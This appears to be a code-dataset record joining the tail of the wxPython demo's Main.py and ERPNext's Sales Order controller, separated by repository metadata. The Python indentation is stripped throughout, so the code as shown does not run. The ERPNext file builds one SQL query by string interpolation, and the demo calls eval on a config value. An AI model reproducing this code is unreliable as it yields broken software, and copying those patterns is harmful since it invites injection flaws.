pagePos = i
break
if page:
if not pageExists:
# Add a new page
nb.AddPage(page, pageText, imageId=nb.GetPageCount())
if debug: wx.LogMessage("DBG: ADDED %s" % pageText)
else:
if nb.GetPage(pagePos) != page:
# Reload an existing page
nb.DeletePage(pagePos)
nb.InsertPage(pagePos, page, pageText, imageId=pagePos)
if debug: wx.LogMessage("DBG: RELOADED %s" % pageText)
else:
# Excellent! No redraw/flicker
if debug: wx.LogMessage("DBG: SAVED from reloading %s" % pageText)
elif pageExists:
# Delete a page
nb.DeletePage(pagePos)
if debug: wx.LogMessage("DBG: DELETED %s" % pageText)
else:
if debug: wx.LogMessage("DBG: STILL GONE - %s" % pageText)
if select == -1:
select = nb.GetSelection()
UpdatePage(self.codePage, "Demo Code")
UpdatePage(self.demoPage, "Demo")
if select >= 0 and select < nb.GetPageCount():
nb.SetSelection(select)
self.pnl.Thaw()
#---------------------------------------------
def SetOverview(self, name, text):
self.curOverview = text
lead = text[:6]
if lead != '<html>' and lead != '<HTML>':
text = '<br>'.join(text.split('\n'))
# if wx.USE_UNICODE:
# text = text.decode('iso8859_1')
self.ovr.SetPage(text)
self.nb.SetPageText(0, os.path.split(name)[1])
#---------------------------------------------
def StartDownload(self):
if self.downloading or not self.allowDocs:
return
item = self.tree.GetSelection()
if self.tree.ItemHasChildren(item):
return
itemText = self.tree.GetItemText(item)
if itemText in self.pickledData:
self.LoadDocumentation(self.pickledData[itemText])
return
text = self.curOverview
text += "<br><p><b>Checking for documentation on the wxWidgets website, please stand by...</b><br>"
lead = text[:6]
if lead != '<html>' and lead != '<HTML>':
text = '<br>'.join(text.split('\n'))
self.ovr.SetPage(text)
self.downloadTimer.Start(100)
self.downloadGauge.Show()
self.Reposition()
self.downloading = True
self.internetThread = InternetThread(self, itemText)
#---------------------------------------------
def StopDownload(self, error=None):
self.downloadTimer.Stop()
if not self.downloading:
return
if error:
if self.sendDownloadError:
self.log.AppendText("Warning: problems in downloading documentation from the wxWidgets website.\n")
self.log.AppendText("Error message from the documentation downloader was:\n")
self.log.AppendText("\n".join(error))
self.sendDownloadError = False
self.nb.SetPageImage(0, 0)
self.internetThread.keepRunning = False
self.internetThread = None
self.downloading = False
self.downloadGauge.Hide()
self.Reposition()
text = self.curOverview
lead = text[:6]
if lead != '<html>' and lead != '<HTML>':
text = '<br>'.join(text.split('\n'))
self.ovr.SetPage(text)
#---------------------------------------------
def LoadDocumentation(self, data):
text = self.curOverview
addHtml = False
if '<html>' not in text and '<HTML>' not in text:
text = '<br>'.join(text.split('\n'))
styles, events, extra, appearance = data
if appearance:
text += FormatImages(appearance)
for names, values in zip(["Styles", "Extra Styles", "Events"], [styles, extra, events]):
if not values:
continue
headers = (names == "Events" and [2] or [3])[0]
text += "<p>" + FormatDocs(names, values, headers)
item = self.tree.GetSelection()
itemText = self.tree.GetItemText(item)
self.pickledData[itemText] = data
if six.PY2:
# TODO: verify that this encoding is correct
text = text.decode('iso8859_1')
self.StopDownload()
self.ovr.SetPage(text)
#print("load time: ", time.time() - start)
# Menu methods
def OnFileExit(self, *event):
self.Close()
def OnToggleRedirect(self, event):
app = wx.GetApp()
if event.Checked():
app.RedirectStdio()
print("Print statements and other standard output will now be directed to this window.")
else:
app.RestoreStdio()
print("Print statements and other standard output will now be sent to the usual location.")
def OnAllowDownload(self, event):
self.allowDocs = event.IsChecked()
if self.allowDocs:
self.StartDownload()
else:
self.StopDownload()
def OnDeleteDocs(self, event):
deleteMsg = "You are about to delete the downloaded documentation.\n" + \
"Do you want to continue?"
dlg = wx.MessageDialog(self, deleteMsg, "wxPython Demo",
wx.YES_NO | wx.NO_DEFAULT| wx.ICON_QUESTION)
result = dlg.ShowModal()
if result == wx.ID_NO:
dlg.Destroy()
return
dlg.Destroy()
busy = wx.BusyInfo("Deleting downloaded data...")
wx.SafeYield()
pickledFile = GetDocFile()
docDir = os.path.split(pickledFile)[0]
if os.path.exists(docDir):
shutil.rmtree(docDir, ignore_errors=True)
self.pickledData = {}
del busy
self.sendDownloadError = True
def OnAllowAuiFloating(self, event):
self.allowAuiFloating = event.Checked()
for pane in self.mgr.GetAllPanes():
if pane.name != "Notebook":
pane.Floatable(self.allowAuiFloating)
self.EnableAUIMenu()
self.mgr.Update()
def EnableAUIMenu(self):
menuItems = self.options_menu.GetMenuItems()
for indx in range(4, len(menuItems)-1):
item = menuItems[indx]
item.Enable(self.allowAuiFloating)
def OnAUIPerspectives(self, event):
perspective = self.perspectives_menu.GetLabel(event.GetId())
self.mgr.LoadPerspective(self.auiConfigurations[perspective])
self.mgr.Update()
def OnSavePerspective(self, event):
dlg = wx.TextEntryDialog(self, "Enter a name for the new perspective:", "AUI Configuration")
dlg.SetValue(("Perspective %d")%(len(self.auiConfigurations)+1))
if dlg.ShowModal() != wx.ID_OK:
return
perspectiveName = dlg.GetValue()
menuItems = self.perspectives_menu.GetMenuItems()
for item in menuItems:
if item.GetLabel() == perspectiveName:
wx.MessageBox("The selected perspective name:\n\n%s\n\nAlready exists."%perspectiveName,
"Error", style=wx.ICON_ERROR)
return
item = wx.MenuItem(self.perspectives_menu, -1, dlg.GetValue(),
"Load user perspective %d"%(len(self.auiConfigurations)+1),
wx.ITEM_RADIO)
self.Bind(wx.EVT_MENU, self.OnAUIPerspectives, item)
self.perspectives_menu.Append(item)
item.Check(True)
self.auiConfigurations.update({dlg.GetValue(): self.mgr.SavePerspective()})
def OnDeletePerspective(self, event):
menuItems = self.perspectives_menu.GetMenuItems()
lst = []
loadDefault = False
for indx, item in enumerate(menuItems):
if indx > 0:
lst.append(item.GetLabel())
dlg = wx.MultiChoiceDialog(self,
"Please select the perspectives\nyou would like to delete:",
"Delete AUI Perspectives", lst)
if dlg.ShowModal() == wx.ID_OK:
selections = dlg.GetSelections()
strings = [lst[x] for x in selections]
for sel in strings:
self.auiConfigurations.pop(sel)
item = menuItems[lst.index(sel)+1]
if item.IsChecked():
loadDefault = True
self.perspectives_menu.GetMenuItems()[0].Check(True)
self.perspectives_menu.DeleteItem(item)
lst.remove(sel)
if loadDefault:
self.mgr.LoadPerspective(self.auiConfigurations[DEFAULT_PERSPECTIVE])
self.mgr.Update()
def OnTreeExpansion(self, event):
self.tree.SetExpansionState(self.expansionState)
def OnHelpAbout(self, event):
from About import MyAboutBox
about = MyAboutBox(self)
about.ShowModal()
about.Destroy()
def OnHelpFind(self, event):
if self.finddlg != None:
return
self.nb.SetSelection(1)
self.finddlg = wx.FindReplaceDialog(self, self.finddata, "Find",
wx.FR_NOMATCHCASE | wx.FR_NOWHOLEWORD)
self.finddlg.Show(True)
def OnUpdateFindItems(self, evt):
evt.Enable(self.finddlg == None)
def OnFind(self, event):
editor = self.codePage.editor
self.nb.SetSelection(1)
end = editor.GetLastPosition()
textstring = editor.GetRange(0, end).lower()
findstring = self.finddata.GetFindString().lower()
backward = not (self.finddata.GetFlags() & wx.FR_DOWN)
if backward:
start = editor.GetSelection()[0]
loc = textstring.rfind(findstring, 0, start)
else:
start = editor.GetSelection()[1]
loc = textstring.find(findstring, start)
if loc == -1 and start != 0:
# string not found, start at beginning
if backward:
start = end
loc = textstring.rfind(findstring, 0, start)
else:
start = 0
loc = textstring.find(findstring, start)
if loc == -1:
dlg = wx.MessageDialog(self, 'Find String Not Found',
'Find String Not Found in Demo File',
wx.OK | wx.ICON_INFORMATION)
dlg.ShowModal()
dlg.Destroy()
if self.finddlg:
if loc == -1:
self.finddlg.SetFocus()
return
else:
self.finddlg.Destroy()
self.finddlg = None
editor.ShowPosition(loc)
editor.SetSelection(loc, loc + len(findstring))
def OnFindNext(self, event):
if self.finddata.GetFindString():
self.OnFind(event)
else:
self.OnHelpFind(event)
def OnFindClose(self, event):
event.GetDialog().Destroy()
self.finddlg = None
def OnOpenShellWindow(self, evt):
if self.shell:
# if it already exists then just make sure it's visible
s = self.shell
if s.IsIconized():
s.Iconize(False)
s.Raise()
else:
# Make a PyShell window
from wx import py
namespace = { 'wx' : wx,
'app' : wx.GetApp(),
'frame' : self,
}
self.shell = py.shell.ShellFrame(None, locals=namespace)
self.shell.SetSize((640,480))
self.shell.Show()
# Hook the close event of the main frame window so that we
# close the shell at the same time if it still exists
def CloseShell(evt):
if self.shell:
self.shell.Close()
evt.Skip()
self.Bind(wx.EVT_CLOSE, CloseShell)
def OnOpenWidgetInspector(self, evt):
# Activate the widget inspection tool, giving it a widget to preselect
# in the tree. Use either the one under the cursor, if any, or this
# frame.
from wx.lib.inspection import InspectionTool
wnd = wx.FindWindowAtPointer()
if not wnd:
wnd = self
InspectionTool().Show(wnd, True)
#---------------------------------------------
def OnCloseWindow(self, event):
self.mgr.UnInit()
self.dying = True
self.demoPage = None
self.codePage = None
self.mainmenu = None
self.StopDownload()
if self.tbicon is not None:
self.tbicon.Destroy()
config = GetConfig()
config.Write('ExpansionState', str(self.tree.GetExpansionState()))
config.Write('AUIPerspectives', str(self.auiConfigurations))
config.Write('AllowDownloads', str(self.allowDocs))
config.Write('AllowAUIFloating', str(self.allowAuiFloating))
config.Flush()
MakeDocDirs()
pickledFile = GetDocFile()
fid = open(pickledFile, "wb")
cPickle.dump(self.pickledData, fid, cPickle.HIGHEST_PROTOCOL)
fid.close()
self.Destroy()
#---------------------------------------------
def OnIdle(self, event):
if self.otherWin:
self.otherWin.Raise()
self.demoPage = self.otherWin
self.otherWin = None
#---------------------------------------------
def OnDownloadTimer(self, event):
self.downloadGauge.Pulse()
self.downloadImage += 1
if self.downloadImage > 9:
self.downloadImage = 3
self.nb.SetPageImage(0, self.downloadImage)
## wx.SafeYield()
#---------------------------------------------
def ShowTip(self):
config = GetConfig()
showTipText = config.Read("tips")
if showTipText:
showTip, index = eval(showTipText)
else:
showTip, index = (1, 0)
# if showTip:
# tp = wx.CreateFileTipProvider(opj("data/tips.txt"), index)
# showTip = wx.ShowTip(self, tp)
# index = tp.GetCurrentTip()
# config.Write("tips", str( (showTip, index) ))
# config.Flush()
#---------------------------------------------
def OnDemoMenu(self, event):
try:
selectedDemo = self.treeMap[self.mainmenu.GetLabel(event.GetId())]
except:
selectedDemo = None
if selectedDemo:
self.tree.SelectItem(selectedDemo)
self.tree.EnsureVisible(selectedDemo)
#---------------------------------------------
def OnIconfiy(self, evt):
wx.LogMessage("OnIconfiy: %s" % evt.Iconized())
evt.Skip()
#---------------------------------------------
def OnMaximize(self, evt):
wx.LogMessage("OnMaximize")
evt.Skip()
#---------------------------------------------
def OnActivate(self, evt):
wx.LogMessage("OnActivate: %s" % evt.GetActive())
evt.Skip()
#---------------------------------------------
def OnAppActivate(self, evt):
wx.LogMessage("OnAppActivate: %s" % evt.GetActive())
evt.Skip()
#---------------------------------------------------------------------------
#---------------------------------------------------------------------------
class MySplashScreen(SplashScreen):
def __init__(self):
bmp = wx.Image(opj("bitmaps/splash.png")).ConvertToBitmap()
SplashScreen.__init__(self, bmp,
wx.adv.SPLASH_CENTRE_ON_SCREEN | wx.adv.SPLASH_TIMEOUT,
5000, None, -1)
self.Bind(wx.EVT_CLOSE, self.OnClose)
self.fc = wx.CallLater(2000, self.ShowMain)
def OnClose(self, evt):
# Make sure the default handler runs too so this window gets
# destroyed
evt.Skip()
self.Hide()
# if the timer is still running then go ahead and show the
# main frame now
if self.fc.IsRunning():
self.fc.Stop()
self.ShowMain()
def ShowMain(self):
frame = wxPythonDemo(None, "wxPython: (A Demonstration)")
frame.Show()
if self.fc.IsRunning():
self.Raise()
wx.CallAfter(frame.ShowTip)
#---------------------------------------------------------------------------
from wx.lib.mixins.treemixin import ExpansionState
if USE_CUSTOMTREECTRL:
import wx.lib.agw.customtreectrl as CT
TreeBaseClass = CT.CustomTreeCtrl
else:
TreeBaseClass = wx.TreeCtrl
class wxPythonDemoTree(ExpansionState, TreeBaseClass):
def __init__(self, parent):
TreeBaseClass.__init__(self, parent, style=wx.TR_DEFAULT_STYLE|
wx.TR_HAS_VARIABLE_ROW_HEIGHT)
self.BuildTreeImageList()
if USE_CUSTOMTREECTRL:
self.SetSpacing(10)
self.SetWindowStyle(self.GetWindowStyle() & ~wx.TR_LINES_AT_ROOT)
self.SetInitialSize((100,80))
def AppendItem(self, parent, text, image=-1, wnd=None):
if USE_CUSTOMTREECTRL:
item = TreeBaseClass.AppendItem(self, parent, text, image=image, wnd=wnd)
else:
item = TreeBaseClass.AppendItem(self, parent, text, image=image)
return item
def BuildTreeImageList(self):
imgList = wx.ImageList(16, 16)
for png in _demoPngs:
imgList.Add(images.catalog[png].GetBitmap())
# add the image for modified demos.
imgList.Add(images.catalog["custom"].GetBitmap())
self.AssignImageList(imgList)
def GetItemIdentity(self, item):
return self.GetItemData(item)
#---------------------------------------------------------------------------
class MyApp(wx.App, wx.lib.mixins.inspection.InspectionMixin):
def OnInit(self):
# Check runtime version
if LooseVersion(version.VERSION_STRING) != LooseVersion(wx.VERSION_STRING):
wx.MessageBox(caption="Warning",
message="You're using version %s of wxPython, but this copy of the demo was written for version %s.\n"
"There may be some version incompatibilities..."
% (wx.VERSION_STRING, version.VERSION_STRING))
self.InitInspection() # for the InspectionMixin base class
# Now that we've warned the user about possibile problems,
# lets import images
import images as i
global images
images = i
# For debugging
#self.SetAssertMode(wx.PYAPP_ASSERT_DIALOG|wx.PYAPP_ASSERT_EXCEPTION)
wx.SystemOptions.SetOption("mac.window-plain-transition", 1)
self.SetAppName("wxPyDemo")
# Create and show the splash screen. It will then create and
# show the main frame when it is time to do so. Normally when
# using a SplashScreen you would create it, show it and then
# continue on with the application's initialization, finally
# creating and showing the main application window(s). In
# this case we have nothing else to do so we'll delay showing
# the main frame until later (see ShowMain above) so the users
# can see the SplashScreen effect.
splash = MySplashScreen()
splash.Show()
return True
#---------------------------------------------------------------------------
def main():
try:
demoPath = os.path.dirname(__file__)
os.chdir(demoPath)
except:
pass
app = MyApp(False)
app.MainLoop()
#---------------------------------------------------------------------------
mainOverview = """<html><body>
<h2>wxPython</h2>
<p> wxPython is a <b>GUI toolkit</b> for the Python programming
language. It allows Python programmers to create programs with a
robust, highly functional graphical user interface, simply and easily.
It is implemented as a Python extension module (native code) that
wraps the popular wxWindows cross platform GUI library, which is
written in C++.
<p> Like Python and wxWindows, wxPython is <b>Open Source</b> which
means that it is free for anyone to use and the source code is
available for anyone to look at and modify. Or anyone can contribute
fixes or enhancements to the project.
<p> wxPython is a <b>cross-platform</b> toolkit. This means that the
same program will run on multiple platforms without modification.
Currently supported platforms are 32-bit Microsoft Windows, most Unix
or unix-like systems, and Macintosh OS X. Since the language is
Python, wxPython programs are <b>simple, easy</b> to write and easy to
understand.
<p> <b>This demo</b> is not only a collection of test cases for
wxPython, but is also designed to help you learn about and how to use
wxPython. Each sample is listed in the tree control on the left.
When a sample is selected in the tree then a module is loaded and run
(usually in a tab of this notebook,) and the source code of the module
is loaded in another tab for you to browse and learn from.
"""
#----------------------------------------------------------------------------
#----------------------------------------------------------------------------
if __name__ == '__main__':
__name__ = 'Main'
main()
#----------------------------------------------------------------------------
|
dnxbjyj/python-basic
|
gui/wxpython/wxPython-demo-4.0.1/demo/Main.py
|
Python
|
mit
| 94,659
|
[
"Galaxy"
] |
616c4e274497dc1e8adc06e136364174122fe13df74089ff87051c9f117bd20b
|
# Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe
import frappe.utils
from frappe.utils import cstr, flt, getdate, comma_and,cint
from frappe import _
from frappe.model.mapper import get_mapped_doc
from erpnext.controllers.selling_controller import SellingController
form_grid_templates = {
"sales_order_details": "templates/form_grid/item_grid.html"
}
class SalesOrder(SellingController):
tname = 'Sales Order Item'
fname = 'sales_order_details'
person_tname = 'Target Detail'
partner_tname = 'Partner Target Detail'
territory_tname = 'Territory Target Detail'
def validate_mandatory(self):
# validate transaction date v/s delivery date
if self.delivery_date:
if getdate(self.transaction_date) > getdate(self.delivery_date):
frappe.throw(_("Expected Delivery Date cannot be before Sales Order Date"))
def validate_po(self):
# validate p.o date v/s delivery date
if self.po_date and self.delivery_date and getdate(self.po_date) > getdate(self.delivery_date):
frappe.throw(_("Expected Delivery Date cannot be before Purchase Order Date"))
if self.po_no and self.customer:
so = frappe.db.sql("select name from `tabSales Order` \
where ifnull(po_no, '') = %s and name != %s and docstatus < 2\
and customer = %s", (self.po_no, self.name, self.customer))
if so and so[0][0]:
frappe.msgprint(_("Warning: Sales Order {0} already exists against same Purchase Order number").format(so[0][0]))
def validate_for_items(self):
check_list, flag = [], 0
chk_dupl_itm = []
for d in self.get('sales_order_details'):
e = [d.item_code, d.description, d.warehouse, d.prevdoc_docname or '']
f = [d.item_code, d.description]
if frappe.db.get_value("Item", d.item_code, "is_stock_item") == 'Yes':
if not d.warehouse:
frappe.throw(_("Reserved warehouse required for stock item {0}").format(d.item_code))
if e in check_list:
frappe.throw(_("Item {0} has been entered twice").format(d.item_code))
else:
check_list.append(e)
else:
if f in chk_dupl_itm:
frappe.throw(_("Item {0} has been entered twice").format(d.item_code))
else:
chk_dupl_itm.append(f)
# used for production plan
d.transaction_date = self.transaction_date
tot_avail_qty = frappe.db.sql("select projected_qty from `tabBin` \
where item_code = %s and warehouse = %s", (d.item_code,d.warehouse))
d.projected_qty = tot_avail_qty and flt(tot_avail_qty[0][0]) or 0
def validate_sales_mntc_quotation(self):
for d in self.get('sales_order_details'):
if d.prevdoc_docname:
res = frappe.db.sql("select name from `tabQuotation` where name=%s and order_type = %s", (d.prevdoc_docname, self.order_type))
if not res:
frappe.msgprint(_("Quotation {0} not of type {1}").format(d.prevdoc_docname, self.order_type))
def validate_order_type(self):
super(SalesOrder, self).validate_order_type()
def validate_delivery_date(self):
if self.order_type == 'Sales' and not self.delivery_date:
frappe.throw(_("Please enter 'Expected Delivery Date'"))
self.validate_sales_mntc_quotation()
def validate_proj_cust(self):
if self.project_name and self.customer_name:
res = frappe.db.sql("""select name from `tabProject` where name = %s
and (customer = %s or ifnull(customer,'')='')""",
(self.project_name, self.customer))
if not res:
frappe.throw(_("Customer {0} does not belong to project {1}").format(self.customer, self.project_name))
def validate(self):
super(SalesOrder, self).validate()
self.validate_order_type()
self.validate_delivery_date()
self.validate_mandatory()
self.validate_proj_cust()
self.validate_po()
self.validate_uom_is_integer("stock_uom", "qty")
self.validate_for_items()
self.validate_warehouse()
from erpnext.stock.doctype.packed_item.packed_item import make_packing_list
make_packing_list(self,'sales_order_details')
self.validate_with_previous_doc()
if not self.status:
self.status = "Draft"
from erpnext.utilities import validate_status
validate_status(self.status, ["Draft", "Submitted", "Stopped",
"Cancelled"])
if not self.billing_status: self.billing_status = 'Not Billed'
if not self.delivery_status: self.delivery_status = 'Not Delivered'
def validate_warehouse(self):
from erpnext.stock.utils import validate_warehouse_company
warehouses = list(set([d.warehouse for d in
self.get(self.fname) if d.warehouse]))
for w in warehouses:
validate_warehouse_company(w, self.company)
def validate_with_previous_doc(self):
super(SalesOrder, self).validate_with_previous_doc(self.tname, {
"Quotation": {
"ref_dn_field": "prevdoc_docname",
"compare_fields": [["company", "="], ["currency", "="]]
}
})
def update_enquiry_status(self, prevdoc, flag):
enq = frappe.db.sql("select t2.prevdoc_docname from `tabQuotation` t1, `tabQuotation Item` t2 where t2.parent = t1.name and t1.name=%s", prevdoc)
if enq:
frappe.db.sql("update `tabOpportunity` set status = %s where name=%s",(flag,enq[0][0]))
def update_prevdoc_status(self, flag):
for quotation in list(set([d.prevdoc_docname for d in self.get(self.fname)])):
if quotation:
doc = frappe.get_doc("Quotation", quotation)
if doc.docstatus==2:
frappe.throw(_("Quotation {0} is cancelled").format(quotation))
doc.set_status(update=True)
def on_submit(self):
super(SalesOrder, self).on_submit()
self.update_stock_ledger(update_stock = 1)
self.check_credit(self.grand_total)
frappe.get_doc('Authorization Control').validate_approving_authority(self.doctype, self.grand_total, self)
self.update_prevdoc_status('submit')
frappe.db.set(self, 'status', 'Submitted')
def on_cancel(self):
# Cannot cancel stopped SO
if self.status == 'Stopped':
frappe.throw(_("Stopped order cannot be cancelled. Unstop to cancel."))
self.check_nextdoc_docstatus()
self.update_stock_ledger(update_stock = -1)
self.update_prevdoc_status('cancel')
frappe.db.set(self, 'status', 'Cancelled')
def check_nextdoc_docstatus(self):
# Checks Delivery Note
submit_dn = frappe.db.sql_list("""select t1.name from `tabDelivery Note` t1,`tabDelivery Note Item` t2
where t1.name = t2.parent and t2.against_sales_order = %s and t1.docstatus = 1""", self.name)
if submit_dn:
frappe.throw(_("Delivery Notes {0} must be cancelled before cancelling this Sales Order").format(comma_and(submit_dn)))
# Checks Sales Invoice
submit_rv = frappe.db.sql_list("""select t1.name
from `tabSales Invoice` t1,`tabSales Invoice Item` t2
where t1.name = t2.parent and t2.sales_order = %s and t1.docstatus = 1""",
self.name)
if submit_rv:
frappe.throw(_("Sales Invoice {0} must be cancelled before cancelling this Sales Order").format(comma_and(submit_rv)))
#check maintenance schedule
submit_ms = frappe.db.sql_list("""select t1.name from `tabMaintenance Schedule` t1,
`tabMaintenance Schedule Item` t2
where t2.parent=t1.name and t2.prevdoc_docname = %s and t1.docstatus = 1""", self.name)
if submit_ms:
frappe.throw(_("Maintenance Schedule {0} must be cancelled before cancelling this Sales Order").format(comma_and(submit_ms)))
# check maintenance visit
submit_mv = frappe.db.sql_list("""select t1.name from `tabMaintenance Visit` t1, `tabMaintenance Visit Purpose` t2
where t2.parent=t1.name and t2.prevdoc_docname = %s and t1.docstatus = 1""",self.name)
if submit_mv:
frappe.throw(_("Maintenance Visit {0} must be cancelled before cancelling this Sales Order").format(comma_and(submit_mv)))
# check production order
pro_order = frappe.db.sql_list("""select name from `tabProduction Order`
where sales_order = %s and docstatus = 1""", self.name)
if pro_order:
frappe.throw(_("Production Order {0} must be cancelled before cancelling this Sales Order").format(comma_and(pro_order)))
def check_modified_date(self):
mod_db = frappe.db.get_value("Sales Order", self.name, "modified")
date_diff = frappe.db.sql("select TIMEDIFF('%s', '%s')" %
( mod_db, cstr(self.modified)))
if date_diff and date_diff[0][0]:
frappe.throw(_("{0} {1} has been modified. Please refresh.").format(self.doctype, self.name))
def stop_sales_order(self):
self.check_modified_date()
self.update_stock_ledger(-1)
frappe.db.set(self, 'status', 'Stopped')
frappe.msgprint(_("{0} {1} status is Stopped").format(self.doctype, self.name))
def unstop_sales_order(self):
self.check_modified_date()
self.update_stock_ledger(1)
frappe.db.set(self, 'status', 'Submitted')
frappe.msgprint(_("{0} {1} status is Unstopped").format(self.doctype, self.name))
def update_stock_ledger(self, update_stock):
from erpnext.stock.utils import update_bin
for d in self.get_item_list():
if frappe.db.get_value("Item", d['item_code'], "is_stock_item") == "Yes":
args = {
"item_code": d['item_code'],
"warehouse": d['reserved_warehouse'],
"reserved_qty": flt(update_stock) * flt(d['reserved_qty']),
"posting_date": self.transaction_date,
"voucher_type": self.doctype,
"voucher_no": self.name,
"is_amended": self.amended_from and 'Yes' or 'No'
}
update_bin(args)
def on_update(self):
pass
def get_portal_page(self):
return "order" if self.docstatus==1 else None
#anand
def get_rm_total_price(self,docname):
for item in self.get('sales_order_details'):
if item.idx==docname:
rm_total_price=frappe.db.get_value("Raw Material Cost Sheet",item.raw_material_costing,'rm_total_price')
spec=frappe.db.get_value("Raw Material Costing Details",{"parent":item.raw_material_costing},'spec')
spec_type=frappe.db.get_value("Raw Material Costing Details",{"parent":item.raw_material_costing},'type')
item.rm_total_price=rm_total_price
item.spec=cstr(spec)+' '+cstr(spec_type)
if rm_total_price:
self.set_rate()
return "Done"
def get_pp_total_price(self,docname):
for item in self.get('sales_order_details'):
if item.idx==docname:
pp_total_price=frappe.db.get_value("Primary Process Costing",item.primary_process_costing,'pp_total')
item.pp_total_price=pp_total_price
if pp_total_price:
self.set_rate()
return "Done"
def get_sm_total_price(self,docname):
for item in self.get('sales_order_details'):
if item.idx==docname:
sm_total_price=frappe.db.get_value("Sub Machining Costing",item.sub_machining_costing,'sm_total')
item.sm_total_price=sm_total_price
if sm_total_price:
self.set_rate()
return "Done"
def get_sp_total_price(self,docname):
for item in self.get('sales_order_details'):
if item.idx==docname:
sp_total_price=frappe.db.get_value("Secondary Process Costing",item.secondary_process_costing,'sp_total')
item.sp_total_price=sp_total_price
if sp_total_price:
self.set_rate()
return "Done"
def set_rate(self):
for item in self.get('sales_order_details'):
item.rate=flt(item.rm_total_price)+flt(item.pp_total_price)+flt(item.sm_total_price)+flt(item.sp_total_price)
return "done"
def get_batch_no_turnkey(self,idx):
for item in self.get('sales_order_details'):
if item.idx==idx:
if item.b_ref:
item.batch_no=item.b_ref
else:
value=frappe.db.get_value('Selling Settings','','turnkey_batch_no')
if value:
batch=self.get_batch_no_t(value)
item.batch_no=batch
item.b_ref=batch
frappe.db.set_value('Selling Settings','','turnkey_batch_no',batch)
return "Done"
def get_batch_no_t(self,value):
import re
batch_no=re.sub(r'\d+(?=[^\d]*$)', lambda m: str(int(m.group())+1).zfill(len(m.group())), value)
return batch_no
def create_job_order(self):
for item in self.get('sales_order_details'):
name_series=self.get_name_series()
if item.job_order:
name=item.job_order
#part_no=item.part_number
else:
name=self.get_job_order(item,name_series)
item.job_order=name
#part_no=item.part_number
self.save(ignore_permissions=True)
self.append_values(name,item.raw_material_costing,"Raw Material Costing Details","Raw Material Cost Sheet","raw_material_costing_details","raw_material_costing","Raw Material Costing",item)
self.append_values(name,item.primary_process_costing,"Primary Process Details","Primary Process Costing","primary_process","primary_process_costing","Primary Process Costing",item)
self.append_values(name,item.secondary_process_costing,"Secondary Process Details","Secondary Process Costing","secondary_process","secondary_process_costing","Secondary Process Costing",item)
self.append_values(name,item.sub_machining_costing,"Sub Machining Details","Sub Machining Costing","sub_machining","sub_machining_costing","Sub Machining Costing",item)
return "Done"
def get_name_series(self):
if self.name:
name=self.name.split("-")
jo_name='JOB-'+name[1]+'-'+cstr(cint(self.id_value)+1)
self.id_value=cint(self.id_value)+1
self.save(ignore_permissions=True)
return jo_name
def get_job_order(self,item,series):
mat_type=item.material_type or ""
if not item.material_type and item.raw_material_costing:
rmc=frappe.get_doc("Raw Material Cost Sheet",item.raw_material_costing).raw_material_costing_details
for d in rmc:
if d.idx==1:
mat_type=cstr(d.spec)+" "+cstr(d.type)
jo=frappe.new_doc("Job Order")
if series:
jo.name=series
jo.customer_code=self.customer
jo.part_name=item.item_name
jo.part_no=item.part_number
jo.drawing_no=item.item_code
jo.qty=item.qty
jo.batch_no=item.batch_no
jo.sales_order=self.name
jo.po_no=self.po_no
jo.start_date=self.from_date
jo.delivery_date=self.delivery_date
jo.material_type=mat_type
jo.save(ignore_permissions=True)
jo.job_order=jo.name
jo.save(ignore_permissions=True)
return jo.name
def append_values(self,jo_name,co_name,co_c_name,co_p_doc,co_c_field,jo_c_field,jo_c_name,item):
if co_name:
jo_obj=frappe.get_doc("Job Order",jo_name)
co=self.get_co_details(co_name,co_c_name,co_p_doc,co_c_field)
jo=self.set_jo_childs(co,jo_obj,jo_c_field,item)
def get_co_details(self,co_name,co_c_name,co_p_doc,co_c_field):
co_c_list=frappe.get_doc(co_p_doc,co_name).get(co_c_field)
return co_c_list
def set_jo_childs(self,co,jo_obj,field,item):
for c in co:
c_obj=jo_obj.append(field,{})
c_obj.type=c.type
c_obj.vendor=c.vendor
c_obj.currency=c.currency
c_obj.mark_percent=c.mark_percent
c_obj.price_with_markup=c.price_with_markup
c_obj.quote_ref=c.quote_ref
c_obj.exchange_rate=c.exchange_rate
if field =='raw_material_costing':
c_obj.spec=c.spec
c_obj.unit_cost=c.unit_cost
c_obj.price=c.price
c_obj.od=c.od
c_obj.od_uom=c.od_uom
c_obj.id=c.id
c_obj.id_uom=c.id_uom
c_obj.lg=c.lg
c_obj.lg_uom=c.lg_uom
c_obj.raw_material_costing=item.raw_material_costing
elif field == "primary_process_costing":
c_obj.spec=c.spec
c_obj.unit_cost=c.unit_cost
c_obj.primary_process_costing=item.primary_process_costing
elif field =='secondary_process_costing':
c_obj.spec=c.spec
c_obj.unit_cost=c.unit_cost
c_obj.secondary_process_costing=item.secondary_process_costing
elif field =="sub_machining_costing":
c_obj.price=c.price
c_obj.sub_machining_costing=item.sub_machining_costing
jo_obj.save(ignore_permissions=True)
@frappe.whitelist()
def make_material_request(source_name, target_doc=None):
def postprocess(source, doc):
doc.material_request_type = "Purchase"
doc = get_mapped_doc("Sales Order", source_name, {
"Sales Order": {
"doctype": "Material Request",
"validation": {
"docstatus": ["=", 1]
}
},
"Sales Order Item": {
"doctype": "Material Request Item",
"field_map": {
"parent": "sales_order_no",
"stock_uom": "uom"
}
}
}, target_doc, postprocess)
return doc
@frappe.whitelist()
def make_delivery_note(source_name, target_doc=None):
def set_missing_values(source, target):
target.ignore_pricing_rule = 1
target.run_method("set_missing_values")
target.run_method("calculate_taxes_and_totals")
def update_item(source, target, source_parent):
target.base_amount = (flt(source.qty) - flt(source.delivered_qty)) * flt(source.base_rate)
target.amount = (flt(source.qty) - flt(source.delivered_qty)) * flt(source.rate)
target.qty = flt(source.qty) - flt(source.delivered_qty)
target_doc = get_mapped_doc("Sales Order", source_name, {
"Sales Order": {
"doctype": "Delivery Note",
"validation": {
"docstatus": ["=", 1]
}
},
"Sales Order Item": {
"doctype": "Delivery Note Item",
"field_map": {
"rate": "rate",
"name": "prevdoc_detail_docname",
"parent": "against_sales_order",
},
"postprocess": update_item,
"condition": lambda doc: doc.delivered_qty < doc.qty
},
"Sales Taxes and Charges": {
"doctype": "Sales Taxes and Charges",
"add_if_empty": True
},
"Sales Team": {
"doctype": "Sales Team",
"add_if_empty": True
}
}, target_doc, set_missing_values)
return target_doc
@frappe.whitelist()
def make_sales_invoice(source_name, target_doc=None):
def postprocess(source, target):
set_missing_values(source, target)
#Get the advance paid Journal Vouchers in Sales Invoice Advance
target.get_advances()
